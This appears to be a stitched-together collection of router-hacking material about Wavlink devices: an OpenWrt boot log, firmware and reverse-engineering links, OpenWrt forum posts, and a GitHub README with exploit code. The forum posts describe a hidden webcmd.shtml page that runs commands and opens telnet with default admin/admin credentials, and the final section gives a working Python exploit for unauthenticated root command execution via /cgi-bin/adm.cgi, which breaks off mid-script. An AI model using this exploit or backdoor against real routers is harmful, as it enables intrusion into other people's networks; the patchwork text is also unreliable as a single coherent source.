[ 1.899783] pci 0000:02:00.0: 2.000 Gb/s available PCIe bandwidth, limited by 2.5 GT/s x1 link at 0000:00:01.0 (capable of 4.000 Gb/s with 5 GT/s x1 link)
[ 1.928629] pci 0000:00:01.0: PCI bridge to [bus 02-ff]
[ 1.939061] pci 0000:00:01.0: bridge window [io 0x0000-0x0fff]
[ 1.951208] pci 0000:00:01.0: bridge window [mem 0x60200000-0x602fffff]
[ 1.964739] pci 0000:00:01.0: bridge window [mem 0x60300000-0x603fffff pref]
[ 1.979145] pci_bus 0000:02: busn_res: [bus 02-ff] end is updated to 02
[ 1.992375] pci 0000:00:00.0: BAR 0: no space for [mem size 0x80000000]
[ 2.005562] pci 0000:00:00.0: BAR 0: failed to assign [mem size 0x80000000]
[ 2.019439] pci 0000:00:01.0: BAR 0: no space for [mem size 0x80000000]
[ 2.032630] pci 0000:00:01.0: BAR 0: failed to assign [mem size 0x80000000]
[ 2.046512] pci 0000:00:00.0: BAR 8: assigned [mem 0x60000000-0x600fffff]
[ 2.060045] pci 0000:00:00.0: BAR 9: assigned [mem 0x60100000-0x601fffff pref]
[ 2.074446] pci 0000:00:01.0: BAR 8: assigned [mem 0x60200000-0x602fffff]
[ 2.087979] pci 0000:00:01.0: BAR 9: assigned [mem 0x60300000-0x603fffff pref]
[ 2.102378] pci 0000:00:00.0: BAR 1: assigned [mem 0x60400000-0x6040ffff]
[ 2.115916] pci 0000:00:01.0: BAR 1: assigned [mem 0x60410000-0x6041ffff]
[ 2.129461] pci 0000:00:00.0: BAR 7: assigned [io 0x1e160000-0x1e160fff]
[ 2.142993] pci 0000:00:01.0: BAR 7: assigned [io 0x1e161000-0x1e161fff]
[ 2.156534] pci 0000:01:00.0: BAR 0: assigned [mem 0x60000000-0x600fffff 64bit]
[ 2.171116] pci 0000:00:00.0: PCI bridge to [bus 01]
[ 2.181016] pci 0000:00:00.0: bridge window [io 0x1e160000-0x1e160fff]
[ 2.194547] pci 0000:00:00.0: bridge window [mem 0x60000000-0x600fffff]
[ 2.208078] pci 0000:00:00.0: bridge window [mem 0x60100000-0x601fffff pref]
[ 2.222485] pci 0000:02:00.0: BAR 0: assigned [mem 0x60200000-0x602fffff 64bit]
[ 2.237073] pci 0000:00:01.0: PCI bridge to [bus 02]
[ 2.246968] pci 0000:00:01.0: bridge window [io 0x1e161000-0x1e161fff]
[ 2.260498] pci 0000:00:01.0: bridge window [mem 0x60200000-0x602fffff]
[ 2.274032] pci 0000:00:01.0: bridge window [mem 0x60300000-0x603fffff pref]
[ 2.289227] hctosys: unable to open rtc device (rtc0)
[ 2.299966] mt7530 mdio-bus:1f: Link is Up - 1Gbps/Full - flow control off
[ 2.317846] VFS: Mounted root (squashfs filesystem) readonly on device 31:5.
[ 2.336249] Freeing unused kernel memory: 1284K
[ 2.345300] This architecture does not have kernel memory protection.
[ 2.358123] Run /sbin/init as init process
[ 2.934235] init: Console is alive
[ 2.941260] init: - watchdog -
[ 3.691015] kmodloader: loading kernel modules from /etc/modules-boot.d/*
[ 3.795457] usbcore: registered new interface driver usbfs
[ 3.806556] usbcore: registered new interface driver hub
[ 3.817293] usbcore: registered new device driver usb
[ 3.837970] xhci-mtk 1e1c0000.xhci: 1e1c0000.xhci supply vbus not found, using dummy regulator
[ 3.855378] xhci-mtk 1e1c0000.xhci: 1e1c0000.xhci supply vusb33 not found, using dummy regulator
[ 3.873126] xhci-mtk 1e1c0000.xhci: xHCI Host Controller
[ 3.883742] xhci-mtk 1e1c0000.xhci: new USB bus registered, assigned bus number 1
[ 3.905075] xhci-mtk 1e1c0000.xhci: hcc params 0x01401198 hci version 0x96 quirks 0x0000000000210010
[ 3.923361] xhci-mtk 1e1c0000.xhci: irq 17, io mem 0x1e1c0000
[ 3.936085] hub 1-0:1.0: USB hub found
[ 3.943711] hub 1-0:1.0: 2 ports detected
[ 3.952415] xhci-mtk 1e1c0000.xhci: xHCI Host Controller
[ 3.963107] xhci-mtk 1e1c0000.xhci: new USB bus registered, assigned bus number 2
[ 3.978038] xhci-mtk 1e1c0000.xhci: Host supports USB 3.0 SuperSpeed
[ 3.990895] usb usb2: We don't know the algorithms for LPM for this host, disabling LPM.
[ 4.007994] hub 2-0:1.0: USB hub found
[ 4.015589] hub 2-0:1.0: 1 port detected
[ 4.029235] kmodloader: done loading kernel modules from /etc/modules-boot.d/*
[ 4.057281] init: - preinit -
[ 4.797915] mtk_soc_eth 1e100000.ethernet eth0: configuring for fixed/rgmii link mode
[ 4.814022] mtk_soc_eth 1e100000.ethernet eth0: Link is Up - 1Gbps/Full - flow control rx/tx
[ 4.830903] IPv6: ADDRCONF(NETDEV_CHANGE): eth0: link becomes ready
[ 4.978504] random: jshn: uninitialized urandom read (4 bytes read)
[ 5.045835] random: jshn: uninitialized urandom read (4 bytes read)
[ 5.117851] random: jshn: uninitialized urandom read (4 bytes read)
[ 5.334563] mt7530 mdio-bus:1f lan1: configuring for phy/gmii link mode
[ 5.348189] 8021q: adding VLAN 0 to HW filter on device lan1
[ 9.537340] mount_root: jffs2 not ready yet, using temporary tmpfs overlay
[ 9.567242] urandom-seed: Seed file not found (/etc/urandom.seed)
[ 9.656614] procd: - early -
[ 9.662505] procd: - watchdog -
[ 10.285095] procd: - watchdog -
[ 10.291682] procd: - ubus -
[ 10.502265] procd: - init -
[ 11.059147] kmodloader: loading kernel modules from /etc/modules.d/*
[ 11.090205] Loading modules backported from Linux version v5.8-0-gbcf876870b95
[ 11.104688] Backport generated by backports.git v5.8-1-0-g79400d9e
[ 11.143165] xt_time: kernel timezone is -0000
[ 11.220696] mt7621-pci 1e140000.pcie: bus=1 slot=0 irq=20
[ 11.231608] pci 0000:00:00.0: enabling device (0004 -> 0007)
[ 11.242917] mt7615e 0000:01:00.0: enabling device (0000 -> 0002)
[ 11.243758] urngd: v1.0.2 started.
[ 11.276530] ieee80211 phy0: Selected rate control algorithm 'minstrel_ht'
[ 11.289884] mt7621-pci 1e140000.pcie: bus=2 slot=1 irq=21
[ 11.300733] pci 0000:00:01.0: enabling device (0004 -> 0007)
[ 11.312082] mt7615e 0000:02:00.0: enabling device (0000 -> 0002)
[ 11.352282] ieee80211 phy1: Selected rate control algorithm 'minstrel_ht'
[ 11.422459] PPP generic driver version 2.4.2
[ 11.434650] NET: Registered protocol family 24
[ 11.464358] kmodloader: done loading kernel modules from /etc/modules.d/*
[ 11.478846] mt7615e 0000:01:00.0: HW/SW Version: 0x8a108a10, Build Time: 20180518100604a
[ 11.478846]
[ 11.498087] mt7615e 0000:02:00.0: HW/SW Version: 0x8a108a10, Build Time: 20180518100604a
[ 11.498087]
[ 11.805806] random: crng init done
[ 11.812625] random: 7 urandom warning(s) missed due to ratelimiting
[ 11.910535] mt7615e 0000:02:00.0: N9 Firmware Version: _reserved_, Build Time: 20200814163649
[ 11.910584] mt7615e 0000:01:00.0: N9 Firmware Version: _reserved_, Build Time: 20200814163649
[ 11.998511] mt7615e 0000:02:00.0: CR4 Firmware Version: _reserved_, Build Time: 20190121161307
[ 11.998519] mt7615e 0000:01:00.0: CR4 Firmware Version: _reserved_, Build Time: 20190121161307
[ 19.612561] ieee80211 phy2: Selected rate control algorithm 'minstrel_ht'
[ 19.612590] ------------[ cut here ]------------
[ 19.622052] WARNING: CPU: 0 PID: 19 at backports-5.8-1/net/wireless/core.c:872 wiphy_register+0xd80/0xd88 [cfg80211]
[ 19.643068] Modules linked in: pppoe ppp_async iptable_nat xt_state xt_nat xt_conntrack xt_REDIRECT xt_MASQUERADE xt_FLOWOFFLOAD xt_CT pppox ppp_generic nf_nat nf_flow_table_hw nf_flow_table nf_conntrack_rtcache nf_conntrack mt7615e mt7615_common mt7603e mt76 mac80211 ipt_REJECT cfg80211 xt_time xt_tcpudp xt_multiport xt_mark xt_mac xt_limit xt_comment xt_TCPMSS xt_LOG slhc nf_reject_ipv4 nf_log_ipv4 nf_defrag_ipv6 nf_defrag_ipv4 iptable_mangle iptable_filter ip_tables crc_ccitt compat nf_log_ipv6 nf_log_common ip6table_mangle ip6table_filter ip6_tables ip6t_REJECT x_tables nf_reject_ipv6 leds_gpio xhci_plat_hcd xhci_pci xhci_mtk xhci_hcd gpio_button_hotplug usbcore nls_base usb_common
[ 19.764451] CPU: 0 PID: 19 Comm: kworker/u4:1 Not tainted 5.4.61 #0
[ 19.776945] Workqueue: phy0 0x873f42e0
[ 19.784398] Stack : 806576d8 87cbdc7c 806d0000 80720000 87cb4080 80668ee4 8738123c 00000009
[ 19.801029] 86c75908 00000001 00000004 8007d624 00000000 00000001 87cbdc38 d999a5ca
[ 19.817657] 00000000 00000000 00000000 00000000 00000030 00000101 6870203a 30203079
[ 19.834282] 00000000 00000000 00000000 000bdaf1 00000000 80740000 00000000 8738123c
[ 19.850909] 00000009 86c75908 00000001 00000004 00000001 8034f8e0 01808117 01808157
[ 19.867535] ...
[ 19.872394] Call Trace:
[ 19.877279] [<8000b72c>] show_stack+0x30/0x100
[ 19.886149] [<805a96e8>] dump_stack+0xa4/0xdc
[ 19.894830] [<8002bea0>] __warn+0xc0/0x10c
[ 19.902978] [<8002bf48>] warn_slowpath_fmt+0x5c/0xac
[ 19.912915] [<8738123c>] wiphy_register+0xd80/0xd88 [cfg80211]
[ 19.924700] [<86c014ac>] ieee80211_register_hw+0x9bc/0xd8c [mac80211]
[ 19.937584] [<873121dc>] mt76_register_phy+0x18/0x38 [mt76]
[ 19.948700] [<873e31e4>] mt7615_register_ext_phy+0x274/0x2ac [mt7615_common]
[ 19.962743] [<800458f0>] process_one_work+0x244/0x498
[ 19.972790] [<80045cac>] worker_thread+0x168/0x5ec
[ 19.982319] [<8004b4dc>] kthread+0x140/0x148
[ 19.990812] [<800068d8>] ret_from_kernel_thread+0x14/0x1c
[ 20.002178] ---[ end trace a5f82ab23c5525ea ]---
[ 22.879487] jffs2_scan_eraseblock(): End of filesystem marker found at 0x0
[ 22.905118] jffs2_build_filesystem(): unlocking the mtd device...
[ 22.905208] done.
[ 22.921475] jffs2_build_filesystem(): erasing all blocks after the end marker...
[ 24.669402] mtk_soc_eth 1e100000.ethernet eth0: Link is Down
[ 24.720136] mtk_soc_eth 1e100000.ethernet eth0: configuring for fixed/rgmii link mode
[ 24.737804] mtk_soc_eth 1e100000.ethernet eth0: Link is Up - 1Gbps/Full - flow control rx/tx
[ 24.766820] IPv6: ADDRCONF(NETDEV_CHANGE): eth0: link becomes ready
[ 24.780800] mt7530 mdio-bus:1f lan1: configuring for phy/gmii link mode
[ 24.820428] 8021q: adding VLAN 0 to HW filter on device lan1
[ 24.854622] br-lan: port 1(lan1) entered blocking state
[ 24.865132] br-lan: port 1(lan1) entered disabled state
[ 24.878823] device lan1 entered promiscuous mode
[ 24.888169] device eth0 entered promiscuous mode
[ 24.935843] mt7530 mdio-bus:1f lan2: configuring for phy/gmii link mode
[ 24.960458] 8021q: adding VLAN 0 to HW filter on device lan2
[ 24.992889] br-lan: port 2(lan2) entered blocking state
[ 25.003449] br-lan: port 2(lan2) entered disabled state
[ 25.043911] device lan2 entered promiscuous mode
[ 25.080783] mt7530 mdio-bus:1f lan3: configuring for phy/gmii link mode
[ 25.124745] 8021q: adding VLAN 0 to HW filter on device lan3
[ 25.157653] br-lan: port 3(lan3) entered blocking state
[ 25.168132] br-lan: port 3(lan3) entered disabled state
[ 25.205570] device lan3 entered promiscuous mode
[ 25.243280] mt7530 mdio-bus:1f lan4: configuring for phy/gmii link mode
[ 25.285919] 8021q: adding VLAN 0 to HW filter on device lan4
[ 25.320230] br-lan: port 4(lan4) entered blocking state
[ 25.330783] br-lan: port 4(lan4) entered disabled state
[ 25.367052] device lan4 entered promiscuous mode
[ 25.420809] mt7530 mdio-bus:1f wan: configuring for phy/gmii link mode
[ 25.440614] 8021q: adding VLAN 0 to HW filter on device wan
[ 29.389475] mt7530 mdio-bus:1f lan4: Link is Up - 1Gbps/Full - flow control rx/tx
[ 29.404508] br-lan: port 4(lan4) entered blocking state
[ 29.414970] br-lan: port 4(lan4) entered forwarding state
[ 29.429366] IPv6: ADDRCONF(NETDEV_CHANGE): br-lan: link becomes ready
[ 29.549460] mt7530 mdio-bus:1f wan: Link is Up - 1Gbps/Full - flow control off
[ 29.563930] IPv6: ADDRCONF(NETDEV_CHANGE): wan: link becomes ready
[ 43.193493] done.
[ 43.197377] jffs2: notice: (1437) jffs2_build_xattr_subsystem: complete building xattr subsystem, 0 of xdatum (0 unchecked, 0 orphan) and 0 of xref (0 dead, 0 orphan) found.
[ 43.350534] overlayfs: upper fs does not support tmpfile.
[ 1247.703714] kmodloader: loading kernel modules from /etc/modules.d/*
[ 1247.722922] kmodloader: done loading kernel modules from /etc/modules.d/*
[ 1247.800040] kmodloader: loading kernel modules from /etc/modules.d/*
[ 1247.814896] kmodloader: done loading kernel modules from /etc/modules.d/*
[ 1247.892238] kmodloader: loading kernel modules from /etc/modules.d/*
[ 1247.907265] kmodloader: done loading kernel modules from /etc/modules.d/*
[ 1247.984304] kmodloader: loading kernel modules from /etc/modules.d/*
[ 1247.999302] kmodloader: done loading kernel modules from /etc/modules.d/*
# padavan, etc, and other
# FIRMWARE
https://www.mediafire.com/file/80a80u2155vt0ta/WN533A8-WAVLINK-20181109/file
# Thank you source here:
https://forum.openwrt.org/t/mt7621-bricked/24802
# Thank you guy who backed up the entire deviwiki keeping it alive with updates here:
http://en.techinfodepot.shoutwiki.com/wiki/Winstars_WS-WN536A8
# Connor; Thank you reverse engineer here:
https://mcmillan.website/openwrt-for-wl-wn575a3/
https://mcmillan.website/rewriting-mt7628an-bootloader/
https://mcmillan.website/openwrt-ws-wn529b3/
# The Resellers with amazing stock firmware
https://play.google.com/store/apps/developer?id=WiLink.APP&hl=en_US
https://ematic.zendesk.com/hc/en-us/articles/360021348313-ERAC3000
https://forum.dd-wrt.com/phpBB2/viewtopic.php?p=1183408&sid=5005cba771e7a8a312f7352275e0ad18
LoopBoot
Nov '20
Hi Guys,
I have installed OpenWrt SNAPSHOT on my WAVLINK AC3000 (model: WL-WN533A8) following these instructions:
https://github.com/bubbadestroy/Jetstream_AC3000
So far everything is going well, but unfortunately I have problems with the radio module. The device usually has 3 different frequency bands (SSIDs) and supports 1x 2.4GHz and 2x 5GHz at the same time:
SSID1 (2.4GHz): WAVLINK-N
SSID2 (5GHz): WAVLINK-AC
SSID3 (5GHz): WAVLINK-AC-1733M
LuCI only shows 2 radio modules under /network/wireless (radio0, radio1). radio0 should support the 2.4GHz band and radio1 the 5GHz band. So far so good.
Now I would like to set up an SSID for radio0 and radio1 each. I named them like this:
radio0: OpenWrt_TEST_N
radio1: OpenWrt_TEST_AC
If I want to set up another, second SSID for radio1 (OpenWrt_TEST_AC1733), the 5GHz radio module no longer starts and hangs up. After restarting the router, I no longer have access to the shell and LuCI, and a connection is no longer possible to configure the router. I have to reset it.
I adjusted the radio channels in the same way as with the OEM firmware. With radio0 it worked without any problems, but not with radio1. If it worked, both SSIDs (OpenWrt_TEST_AC / OpenWrt_TEST_AC1733) were broadcasting on the same channel. The channels are and should be different from the factory.
Did I do something wrong? Why do I only see 2 radio modules? Is the driver for this router possibly incompatible because I worked according to the instructions for the WS-WN536A8? But according to these instructions, the same hardware should be installed.
OpenWrt SNAPSHOT r14900-acb336235c

vwnut8392

https://forum.openwrt.org/t/trick-discovered-to-enable-telnet-on-wavlink-wl-wn570ha1-factory-firmware/49342

Trick discovered to enable telnet on Wavlink WL-WN570HA1 factory firmware
Hardware Questions and Recommendations
vwnut8392 Nov '19

I figured out late last night how to enable telnet on the WL-WN570HA1 that's running 190220 firmware. There is a hidden web page at http://192.168.10.1/webcmd.shtml. Once you are on this page, type telnetd into the command box and press the apply button. Nothing will show up in the lower box as a reply, but if you port scan the device you will find port 2323 is now open for telnet. The default login=admin password=admin.

It's still limited on what can be done because of limited commands like no wget, but it's another door into the device that could lead to something. This may or may not work on other firmware revisions but it definitely works on 190220.

The link below is to the Wavlink WL-WN570HA1 190220 firmware. You can upgrade to this through the default firmware upgrade page. https://drive.google.com/open?id=1PlySf2y8X1vHCdl4wZT8hUtIO4QxcmHw


WL-WN572HG3 Soft Hack?

4 months later

frustro PolynomialDivision 26d

I got in, the uart was not any of the groups of 4 pin header vias, it was a lone 2 holes about 3-4 inches from the end. I don't remember which one. Here's me putting around in putty: the pastebin. I eventually figured this out and was able to load images across with tftp and attempt to boot. IIRC I kept running into storage issues. Couldn't find something to mount, another just went to kernel panic. That was with the official nightlies for that soc and glue hardware. I then made a builder machine and cooked up this

Booting image at 82000000 ...
Image Name: MIPS OpenWrt Linux-4.14.180
Image Type: MIPS Linux Kernel Image (lzma compressed)
Data Size: 3813618 Bytes = 3.6 MB
Load Address: 80000000
Entry Point: 80000000
Verifying Checksum ... OK
Uncompressing Kernel Image ... OK
No initrd

Transferring control to Linux (at address 80000000) ...

Giving linux memsize in MB, 64

Starting kernel ...

Linux version 4.14.180 (builder@buildhost) (gcc version 7.5.0 (OpenWrt GCC 7.5.0 r11063-85e04e9f46)) #0 Sat May 16 18:32:20 2020
Board has DDR2

but downtime was annoying people so that is as far as I got.

I'll get back to it soon.

frustro 24d

I downloaded the file from the link above, ran it through binwalk. Other than some auth server in france it seems ok. Need to go through it some more.

Telnet port 2323 opened up for me and I was able to login as admin2860 with the password set on the initial setup wizard.

I have since created a new user. I'll be compiling ssh for it later today.

The initial login busybox is missing many commands so be sure to execute /bin/busybox for a larger command set.

/bin/busybox

BusyBox v1.12.1 (2020-02-29 14:28:25 CST) multi-call binary
Copyright (C) 1998-2008 Erik Andersen, Rob Landley, Denys Vlasenko and others. Licensed under GPLv2. See source distribution for full notice.

Usage: busybox [function] [arguments]...
   or: function [arguments]...

    BusyBox is a multi-call binary that combines many common Unix
    utilities into a single executable.  Most people will create a
    link to busybox for each function they wish to use and BusyBox
    will act like whatever it was invoked as!

Currently defined functions: [, [[, addgroup, adduser, arp, arping, ash, awk, brctl, cat, chmod, chpasswd, cp, crond, crontab, cut, date, dd, delgroup, deluser, df, diff, dmesg, dumpleases, echo, expr, fdisk, free, getty, grep, halt, head, hexdump, hostname, id, ifconfig, init, init, insmod, kill, killall, klogd, ln, logger, login, ls, lsmod, md5sum, mdev, mkdir, mknod, mount, netstat, nslookup, passwd, ping, ping6, poweroff, printf, ps, pwd, reboot, rm, rmmod, route, sed, seq, sh, sleep, sulogin, sync, sysctl, syslogd, telnetd, test, tftp, time, top, touch, tr, udhcpc, udhcpd, umount, uptime, vconfig, vi, vlock, wc, wget

ls -l

drwxr-xr-x 3 0 0 0 dev
drwxr-xr-x 5 0 0 0 usr
drwxr-xr-x 3 0 0 0 etc
drwxr-xr-x 4 0 0 0 lib
drwxr-xr-x 2 0 0 0 mnt
drwxr-xr-x 3 0 0 0 home
drwxr-xr-x 2 0 0 0 sbin
drwxr-xr-x 6 0 0 0 var
lrwxrwxrwx 1 0 0 11 init -> bin/busybox
drwxr-xr-x 11 0 0 0 etc_ro
drwxr-xr-x 11 0 0 0 sys
drwxr-xr-x 2 0 0 0 bin
dr-xr-xr-x 49 0 0 0 proc
drwxr-xr-x 4 0 0 0 tmp
drwxr-xr-x 2 0 0 0 media
drwxr-xr-x 3 0 0 0 vendor

pwd

/

cd /etc

cd ..

cd etc_ro/lighttpd/www/

ls -l

drwxr-xr-x 2 0 0 0 cgi-bin -rwxr-xr-x 1 0 0 17986 sch_reboot.shtml -rwxr-xr-x 1 0 0 10047 live_test.shtml -rwxr--r-- 1 0 0 43 live_dmesg.shtml -rwxr--r-- 1 0 0 3322 live_mfg.shtml -rwxr-xr-x 1 0 0 48 mesh_get_signal.shtml -rwxr-xr-x 1 0 0 38951 lang2_fr.js -rwxr-xr-x 1 0 0 27082 live_get_mesh_app.shtml -rwxr-xr-x 1 0 0 47 live_setLedOff.shtml drwxr-xr-x 2 0 0 0 wifi_wavlink -rwxr-xr-x 1 0 0 1518 live_check_ddns.shtml -rwxr-xr-x 1 0 0 16466 wifi_rep.shtml -rwxr-xr-x 1 0 0 939 main1.shtml -rwxr-xr-x 1 0 0 12625 update_mesh_app.shtml -rwxr-xr-x 1 0 0 3976 webcmd.shtml -rwxr-xr-x 1 0 0 30438 wizard_rep.shtml -rwxr-xr-x 1 0 0 47 live_cli_signal.shtml -rwxr-xr-x 1 0 0 15622 login.shtml -rwxr-xr-x 1 0 0 27925 wizard_wisp_mesh.shtml -rwxr-xr-x 1 0 0 1329 live_check_fw.shtml -rwxr-xr-x 1 0 0 23266 reset_reboot.shtml -rwxr-xr-x 1 0 0 29315 main.shtml -rwxr-xr-x 1 0 0 188 live_getsettings.shtml -rwxr-xr-x 1 0 0 27605 live_get_mesh.shtml -rwxr-xr-x 1 0 0 25819 setting.shtml -rwxr--r-- 1 0 0 34476 lang2_en.js -rwxr-xr-x 1 0 0 18053 wifi.shtml -rwxr-xr-x 1 0 0 29937 wizard_wisp.shtml -rwxr-xr-x 1 0 0 34757 wifi_base.shtml -rwxr-xr-x 1 0 0 9218 linux.css -rwxr-xr-x 1 0 0 48 live_ddns.shtml -rwxr-xr-x 1 0 0 8327 live_check.shtml -rwxr-xr-x 1 0 0 13872 ddns.shtml -rwxr-xr-x 1 0 0 46 live_mac.shtml -rwxr-xr-x 1 0 0 302 live_setting.shtml -rwxr-xr-x 1 0 0 15038 check_update.shtml -rwxr-xr-x 1 0 0 12613 update_mesh.shtml -rwxr-xr-x 1 0 0 32242 lang2_cn.js -rwxr-xr-x 1 0 0 14086 update_uboot.shtml -rwxr-xr-x 1 0 0 18095 nas_disk.shtml -rwxr-xr-x 1 0 0 42 live_language.shtml -rwxr-xr-x 1 0 0 1224 live_internet.shtml -rwxr-xr-x 1 0 0 10234 reset_app.shtml -rwxr-xr-x 1 0 0 430 mesh_satellite_status.shtml -rwxr-xr-x 1 0 0 32648 linux.js -rwxr-xr-x 1 0 0 3470 lang_net_conf.js -rwxr-xr-x 1 0 0 38928 lang2_es.js -rwxr-xr-x 1 0 0 2842 live_status.shtml -rwxr--r-- 1 0 0 28817 net_tool.shtml -rwxr-xr-x 1 0 0 6 apptimeout.shtml -rwxr-xr-x 1 0 0 485 mesh_get_extender.shtml -rwxr-xr-x 1 0 0 10756 
ledonoff.shtml -rwxr-xr-x 1 0 0 13893 nightlight_onoff.shtml -rwxr-xr-x 1 0 0 309 803F5D.txt -rwxr-xr-x 1 0 0 32752 lang2_tw.js -rwxr-xr-x 1 0 0 1463 live_speed.shtml -rwxr-xr-x 1 0 0 3031 live_signal.shtml -rwxr-xr-x 1 0 0 19951 lan.shtml -rwxr-xr-x 1 0 0 46 live_internetStatus.shtml -rwxr-xr-x 1 0 0 20386 wifi_advance2.shtml -rwxr-xr-x 1 0 0 44989 lang2_jp.js -rwxr-xr-x 1 0 0 2540 live_online.shtml drwxr-xr-x 2 0 0 0 Templates -rwxr-xr-x 1 0 0 25381 devicestat.shtml -rwxr-xr-x 1 0 0 32253 wizard_ap.shtml -rwxr-xr-x 1 0 0 25527 wifi_advance5.shtml -rwxr-xr-x 1 0 0 27986 sysinit.shtml -rwxr-xr-x 1 0 0 9897 wifi_roaming.shtml -rwxr-xr-x 1 0 0 17343 wifi_mesh.shtml -rwxr-xr-x 1 0 0 35522 lang2_nl.js -rwxr-xr-x 1 0 0 85 lan_get_strength.shtml -rwxr-xr-x 1 0 0 30036 wizard_router.shtml -rwxr-xr-x 1 0 0 9240 fileerror.shtml -rwxr-xr-x 1 0 0 17378 wifi_touchlink.shtml -rwxr-xr-x 1 0 0 19178 set_time.shtml -rwxr-xr-x 1 0 0 16705 set_safety.shtml -rwxr-xr-x 1 0 0 3449 lang_jet_conf.js -rwxr-xr-x 1 0 0 25168 wizard_client.shtml -rwxr-xr-x 1 0 0 21683 wizard.shtml -rwxr-xr-x 1 0 0 54 live_disk.shtml -rwxr-xr-x 1 0 0 93436 jquery-1.8.2.min.js -rwxr-xr-x 1 0 0 45 mesh_sync.shtml -rwxr-xr-x 1 0 0 27887 wizard_router_mesh.shtml -rwxr-xr-x 1 0 0 22786 wifi_base_mesh.shtml drwxr-xr-x 2 0 0 0 images -rwxr-xr-x 1 0 0 12239 sitesurvey.shtml -rwxr-xr-x 1 0 0 10404 man_security.shtml -rwxr-xr-x 1 0 0 19516 update.shtml -rwxr-xr-x 1 0 0 39227 lang2_it.js -rwxr-xr-x 1 0 0 13145 reset.shtml -rwxr-xr-x 1 0 0 10432 wifi.js -rwxr-xr-x 1 0 0 44 mesh_get_mode.shtml -rwxr--r-- 1 0 0 15212 cli_control.shtml -rwxr-xr-x 1 0 0 12381 wifi_region.shtml -rwxr-xr-x 1 0 0 1150 favicon.ico -rwxr-xr-x 1 0 0 38657 lang2_de.js -rwxr-xr-x 1 0 0 19631 update_mesh_fw.shtml -rwxr-xr-x 1 0 0 2963 live_repsignal.shtml -rwxr-xr-x 1 0 0 18230 extender_set_ssid.shtml -rwxr-xr-x 1 0 0 8825 md5.js -rwxr-xr-x 1 0 0 11845 wifi_mode.shtml -rwxr-xr-x 1 0 0 13101 wifi_guest.shtml -rwxr-xr-x 1 0 0 30991 wan.shtml -rwxr-xr-x 
1 0 0 16120 ledonoff_mesh.shtml -rwxr-xr-x 1 0 0 46 live_setLedOn.shtml -rwxr-xr-x 1 0 0 3466 lang_conf.js -rwxr-xr-x 1 0 0 11961 reset_update.shtml lrwxrwxrwx 1 0 0 17 messages.txt -> /var/log/messages lrwxrwxrwx 1 0 0 12 speed.tmp -> /bin/busybox

frustro 24d

Well, I guess all of that was kinda pointless.

Random firmware from @alecuba16

Here is his FW image: http://IP/webcmd.shtml /bin/busybox [image]

And here is OEM firmware: http://IP/webcmd.shtml /bin/busybox [image: OEM firmware]

So I guess there was a built in root access anyways.

I'll still document the board for USB host (x2?) and the UART for serial.

~frustro

frustro 24d

============ PuTTY log 2020.08.22 18:21:56 ============
WAVLINK login: admin2860
Password:

BusyBox v1.12.1 (2019-02-28 15:06:05 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

/bin/busybox

BusyBox v1.12.1 (2019-02-28 15:06:05 CST) multi-call binary
Copyright (C) 1998-2008 Erik Andersen, Rob Landley, Denys Vlasenko and others. Licensed under GPLv2. See source distribution for full notice.

Usage: busybox [function] [arguments]...
   or: function [arguments]...

    BusyBox is a multi-call binary that combines many common Unix
    utilities into a single executable.  Most people will create a
    link to busybox for each function they wish to use and BusyBox
    will act like whatever it was invoked as!

Currently defined functions: [, [[, addgroup, adduser, arp, ash, awk, brctl, cat, chmod, chpasswd, cp, crond, crontab, cut, date, delgroup, deluser, df, dmesg, dumpleases, echo, expr, fdisk, free, getty, grep, halt, head, hexdump, hostname, id, ifconfig, init, init, insmod, kill, killall, klogd, ln, logger, login, ls, lsmod, md5sum, mdev, mkdir, mknod, mount, netstat, nslookup, passwd, ping, ping6, poweroff, printf, ps, pwd, reboot, rm, rmmod, route, sed, seq, sh, sleep, sulogin, sync, syslogd, telnetd, test, tftp, time, top, touch, tr, udhcpc, udhcpd, umount, uptime, vconfig, vi, vlock, wc, wget

adduser frustro

Changing password for frustro
New password:
Retype password:
Password for frustro changed by admin2860

login

WAVLINK login: frustro
Password:

BusyBox v1.12.1 (2019-02-28 15:06:05 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

exit

PolynomialDivision frustro 22d

Nice! So we don't have any trouble flashing random firmware?

I will buy me some device, too.

frustro 22d

I wouldn't recommend this device at all @PolynomialDivision. The ethernet ports are only 10/100 so if you have internet faster than 100mbps you have a bottleneck there. The only way to get around that is to have the unit in repeater mode and use 5g wifi to connect to your local network. Using the ethernet in AP or Router mode will just slow everything down to the speed of that port.

It's possible that the USB ports are there but just not populated and you might be able to add a USB gigabit ethernet adapter and then cook that into an openwrt FW image.

Just a thought.

~frustro

PolynomialDivision frustro 22d

10/100

o.O

Thanks! Okay.

PolynomialDivision 21d

@frustro

Any idea if there is some Mediatek Outdoor Hardware, that has 1 GB port?

I would like to try Mediatek Device, but maybe I have to stick to EAP225 Outdoor.

bubbadestroy commented Sep 15, 2020

ERAC3000UMNewEMB
#erac3000umnewemb
Fork
Jul 1
WLN300-Exploit-and-patch

Wavlink router remote code execution exploit code and patch code. (wavlink n300). This exploit requires no authentication other than being on the same sub network. The exploit will give RCE with root access.

How to use

python3 Exploit.py 192.168.0.1

Disclosure date

04/06/2018

Requirements

pip install requests
python version 3

How does the exploit work?

The router has a hidden developer console that can be accessed over port 80, the program will make requests to emulate a shell and allow remote code execution on the target

How does the patch work?

The patch works by exploiting the system and removing the vulnerable file to prevent further exploitation

Warranty

Use this code at your own risk, this code comes with no warranty. Never run this code against a wavlink router that you do not own, even the patch.

Contribution

Feel free to contribute as my error testing is not comprehensive
also I have not tested the patch (as this would fix my router and I want to be able to play with other bin files etc on the router)

exploit.py

import requests
import sys


def main():
    if len(sys.argv) != 2:
        print("[-]Please supply an ip address")
        print("[ ]python exploit.py ")
        sys.exit(0)
    ip = sys.argv[1]

    print("[+]Correct number of argv")
    print("[+]WAV-LINK (WL-WN529N2) exploit")
    print("[ ]This is a demo and should only be used on your own equipment")
    print("[ ]Running this program can brick the router forever, use with caution")

    prompt = "[ ]Press 'Y' to exploit or 'n' to patch the device\n"
    ans = input("[ ]Red team or Blue team?\n[ ]This tool can be used to exploit or patch the router\n" + prompt)
    loop = 0
    while loop == 0:
        if (ans == "y" or ans == "Yes" or ans == "Y" or ans == "yes"):
            # Emulate a shell: post each command to the console's CGI handler,
            # then fetch the console page to read the output back.
            while(1):
                try:
                    command = input("root@" + ip + ":")
                    r = requests.post("http://" + ip + "/cgi-bin/adm.cgi/", data = {'page':'sysCMD', 'command': command, 'SystemCommandSubmit':'Apply'})
                    r2 = requests.get("http://" + ip + "/webcmd.shtml")
                    find(r2.text)
                except Exception as e:
                    print(e)
